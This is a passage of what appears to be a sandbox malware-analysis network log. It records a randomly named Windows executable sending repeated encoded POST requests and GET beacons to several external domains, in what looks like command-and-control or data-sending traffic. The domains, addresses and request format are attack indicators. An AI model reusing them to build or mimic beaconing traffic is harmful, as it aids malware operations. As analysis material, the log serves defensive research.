                                                    Data Ascii: =languagemodel.pro"><strong>View the WHOIS results of languagemodel.pro</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    17 | 192.168.2.4 | 49754 | 63.250.47.40 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:13.335305929 CEST | 804 | OUT | POST /3bdq/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.kexweb.top
                                                    Origin: http://www.kexweb.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.kexweb.top/3bdq/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 76 61 79 57 38 35 50 54 53 4f 58 6c 31 71 6f 4e 63 70 6c 59 32 72 53 6b 72 79 33 66 64 6b 71 72 4d 45 62 71 68 7a 62 59 30 46 59 6e 64 6f 73 4f 41 45 51 71 4b 55 6e 6c 72 72 44 33 6b 5a 35 73 32 41 38 34 6e 6f 45 6e 67 45 77 5a 75 62 70 78 6e 7a 32 4d 6a 6f 4c 54 70 67 4a 42 5a 56 4f 79 44 56 45 6c 34 31 32 44 46 62 48 70 65 63 30 5a 45 51 6d 6d 6d 6c 4c 4f 4d 39 49 73 35 46 33 50 71 37 57 55 4e 78 54 45 63 55 58 4b 57 6c 74 32 4e 6b 78 6c 71 77 74 32 35 35 2b 75 6f 49 6d 65 59 63 39 71 4d 54 6b 77 6e 35 37 55 76 76 6a 4f 42 76 67 72 7a 41 3d 3d
                                                    Data Ascii: y0qt3F=rNrPDBiknVqXvayW85PTSOXl1qoNcplY2rSkry3fdkqrMEbqhzbY0FYndosOAEQqKUnlrrD3kZ5s2A84noEngEwZubpxnz2MjoLTpgJBZVOyDVEl412DFbHpec0ZEQmmmlLOM9Is5F3Pq7WUNxTEcUXKWlt2Nkxlqwt255+uoImeYc9qMTkwn57UvvjOBvgrzA==
                                                    Sep 26, 2024 09:25:13.975920916 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:13 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 389
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    18 | 192.168.2.4 | 49755 | 63.250.47.40 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:15.876813889 CEST | 824 | OUT | POST /3bdq/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.kexweb.top
                                                    Origin: http://www.kexweb.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.kexweb.top/3bdq/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 65 72 4c 68 6e 71 69 79 62 59 7a 46 59 6e 46 34 73 4c 4f 6b 51 68 4b 55 62 58 72 72 76 33 6b 61 46 73 32 42 4d 34 6d 66 51 34 68 55 77 62 69 37 70 7a 6f 54 32 4d 6a 6f 4c 54 70 67 74 6e 5a 52 61 79 44 6c 30 6c 2b 58 4f 4d 61 72 48 71 4b 4d 30 5a 58 41 6d 69 6d 6c 4b 2b 4d 38 55 53 35 44 7a 50 71 35 65 55 44 41 54 44 46 6b 57 42 59 46 74 34 4f 32 45 41 73 68 55 2b 32 35 6d 61 69 64 43 52 64 61 73 77 64 69 46 6e 31 35 66 6e 79 6f 71 36 4d 73 64 69 6f 45 41 6b 47 53 4a 55 34 49 61 38 67 35 57 44 31 4b 74 52 34 78 49 3d
                                                    Data Ascii: y0qt3F=rNrPDBiknVqXu7iW5anTXuX6saoNL5kR2rWkr2v2eWerLhnqiybYzFYnF4sLOkQhKUbXrrv3kaFs2BM4mfQ4hUwbi7pzoT2MjoLTpgtnZRayDl0l+XOMarHqKM0ZXAmimlK+M8US5DzPq5eUDATDFkWBYFt4O2EAshU+25maidCRdaswdiFn15fnyoq6MsdioEAkGSJU4Ia8g5WD1KtR4xI=
                                                    Sep 26, 2024 09:25:16.517745018 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:16 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 389
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    19 | 192.168.2.4 | 49756 | 63.250.47.40 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:18.427360058 CEST | 10906 | OUT | POST /3bdq/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.kexweb.top
                                                    Origin: http://www.kexweb.top
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.kexweb.top/3bdq/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 72 4e 72 50 44 42 69 6b 6e 56 71 58 75 37 69 57 35 61 6e 54 58 75 58 36 73 61 6f 4e 4c 35 6b 52 32 72 57 6b 72 32 76 32 65 57 6d 72 4c 54 66 71 6c 6c 76 59 79 46 59 6e 62 6f 73 4b 4f 6b 51 47 4b 51 33 54 72 72 79 43 6b 63 4a 73 33 6e 77 34 68 72 38 34 72 55 77 62 71 62 70 2b 6e 7a 33 4d 6a 6f 62 58 70 67 39 6e 5a 52 61 79 44 6e 73 6c 70 56 32 4d 59 72 48 70 65 63 30 46 45 51 6d 4b 6d 68 66 47 4d 38 51 43 35 7a 54 50 72 5a 4f 55 42 79 37 44 61 55 57 44 62 46 73 2b 4f 32 59 54 73 68 49 59 32 36 37 50 69 62 2b 52 66 4c 46 70 59 51 4e 4b 68 49 62 38 73 61 32 65 4a 66 42 61 77 32 41 2b 41 78 70 2f 76 4a 79 73 73 37 33 48 73 4c 46 48 72 6e 71 59 30 61 35 56 51 35 4f 61 73 33 48 72 58 64 6d 42 78 73 36 58 6b 48 79 2b 77 2f 78 73 59 4d 2b 34 37 2f 44 44 6a 51 33 75 69 78 4b 4b 43 6c 35 72 33 57 31 2f 63 35 42 66 6f 37 63 48 4f 71 51 58 4c 52 41 7a 52 71 57 32 72 50 73 48 61 44 4e 67 6d 38 6a 51 2b 2b 78 72 4d 6e 73 59 6c 33 57 2f 52 2f 76 6a 32 6d 4e 49 59 78 6e 44 31 6b 38 6d 71 42 6b [TRUNCATED]
                                                    Data Ascii: y0qt3F= [TRUNCATED]
                                                    Sep 26, 2024 09:25:19.074285984 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:18 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 389
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    20 | 192.168.2.4 | 49757 | 63.250.47.40 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:20.968595982 CEST | 540 | OUT | GET /3bdq/?y0qt3F=mPDvA1qI3GiuntP60bqgVobnrbMnRYp61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exu2k3ruJCpl2j2bvSmTd+X0q2Ansy3FLMFak=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.kexweb.top
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:25:21.625936031 CEST | 610 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:21 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 389
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    21 | 192.168.2.4 | 49758 | 91.184.0.200 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:26.689239979 CEST | 831 | OUT | POST /ikh0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.jobworklanka.online
                                                    Origin: http://www.jobworklanka.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.jobworklanka.online/ikh0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Ascii: y0qt3F=otZcyeHXRsUakctfudvHHXqlWG/6yRQhd1rL2TC/GjIouwn0B76eeoOda5nlGU9kM3iKDWjaIpHc0DyAMQWqhLmmOoNoogYrdjwtQ5n4bHLpq9wHtihl8rlx5RcIN1O31hib1lD0dH6IcO+1IcexI2RQ7ZWTH2PuBGncj4UxRDal7+cPRtXrvDEgcD6zp1qATA==
                                                    Sep 26, 2024 09:25:28.538357973 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:27 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                    Sep 26, 2024 09:25:28.538990021 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:27 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                                                    Sep 26, 2024 09:25:28.539381981 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:27 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    22 | 192.168.2.4 | 49759 | 91.184.0.200 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:29.238564014 CEST | 851 | OUT | POST /ikh0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.jobworklanka.online
                                                    Origin: http://www.jobworklanka.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.jobworklanka.online/ikh0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Ascii: y0qt3F=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGWgovRX0A66eTIOdQZngL097M3uCDXPaIpjc0DCANnipnbmoV4NQlAYrdjwtQ5yjbGvprNAHvHNk2LlwpxcIfFOz1hj81keTdB2IcMm1IJrnD2Q615XZEmr+Pk2rh7AKQxu03YNVAc289DgTBEzHk2XJIJz1aWd7eIdXFafKSyA1QwQ=
                                                    Sep 26, 2024 09:25:29.847120047 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:29 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    23 | 192.168.2.4 | 49760 | 91.184.0.200 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:31.802073956 CEST | 10933 | OUT | POST /ikh0/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.jobworklanka.online
                                                    Origin: http://www.jobworklanka.online
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.jobworklanka.online/ikh0/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Ascii: y0qt3F=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGW4ovjf0AZSecoOdLZnhL09yMzCGDXytIvncyg6AEz+ppbmocYNrogY+djApQ5ijbGvprOYHmyhkwLlx5RcEN1OX1lHG1kapcxWIbs21EbDnBWRc25WMEmW5Pk6dh6EgQyy00vIzFv+Vr1wSDkXckE6QNIOQRWVgI8FXf7ybHgk+M1zLfeux2/kR5i/JRfw+zDO8bY+NpU5jkZTViE2V31Xmyewx6JX6aByrx10pic4bCG8HqlbW1V0eS6NE3gFMXHSXbeEFTPPDkJ2pmmSuPq9v3TrcG9k6y7/zvRmh0e4enPpsIBSDjoKk3erOT56EHMjs8gGo1YKlDN7SkPVZipQuCdSvp/nvemte90OZB1XLFUtBy8OWUTcn4l6cowsSt94oT1c2hmH3Q8rtYAfMc4uh9QZ9dn86sR8YHV+w+wHtlFOXqedOZnT5UGzScIBm8vxqbVbCm3wo29GoH+cocsfLqibj+cFzGfR7ZF6Ji6nF5qPnWzbcMyENkpU2vxavQjhi32LavedADP4ZucC4uwblFgkHoJVJgvb1MdP2Pp4K3nvloHyETmL1WBY+rq0VuDvyl2ypPh1ZcbWIFEt8wwfpolRGaQtlbC1xf8RtCmVz+vuMCJuH0Ouv8Z//Mu/8WyZ0RLKqnyAqLTkzEbe6PMLapOMmsH4AWyfqZ4RnMk1qGlpbK2NDA5LJS7qeN3fprZWtVW8yYugK8izpaEyyEHDGUlJYpV1eVqwou0JS+bCzpyBjBpVYbyuxx8Y1iFG/2lonKgKvykkNV5hW6kgJI+SrJ5QnQ1LLQeiIt4N3g/IMUQz7e1A2z9F4T2lvzvSYznE/HOAoGa2h8H239FgXpAP8d6C1ONHU8Y2eEAWZ3vvww6zA7PLU91OpU7E1pam5j5NkY0Ojf5fo6HwNNz5j9y5IitJkjYd+0a0QkovblLupgpvX+irnP3ZIuT4crgepDqbW0 [TRUNCATED]
                                                    Sep 26, 2024 09:25:32.503022909 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:32 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    24 | 192.168.2.4 | 49761 | 91.184.0.200 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:34.343224049 CEST | 549 | OUT | GET /ikh0/?y0qt3F=lvx8xqKuEeZXr5ITqNCHPh3uOhDJ1jEsZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1vJ6qU/h+jhYmRiU/b4DSTDHjmvsEtFplu6A=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.jobworklanka.online
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:25:34.954703093 CEST | 500 | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 26 Sep 2024 07:25:34 GMT
                                                    Server: Apache
                                                    X-Xss-Protection: 1; mode=block
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Content-Type-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 196
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    25 | 192.168.2.4 | 49762 | 13.248.169.48 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:40.024842978 CEST | 801 | OUT | POST /h7lb/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.dyme.tech
                                                    Origin: http://www.dyme.tech
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.dyme.tech/h7lb/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Ascii: y0qt3F=cZnnZ5lw9mVosJSJb/kT3H7G7UytJnuz6UFc47FTMoDJksYXsHUXIw9PvV1gx8VRZSwqmzvx0EGz+IQRbsz1aOw8iKnLtNoasw4J8YmB9O4fVIBC/06ko8+iDWFUNDTIvJdHu9hAGnVUjThiWdFF92PdAyCFjc0Kt9lx7D6vGdEaPoewvcYv7ZsGxE9lzBUFxQ==


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    26 | 192.168.2.4 | 49763 | 13.248.169.48 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:25:42.565227985 CEST | 821 | OUT | POST /h7lb/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.dyme.tech
                                                    Origin: http://www.dyme.tech
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
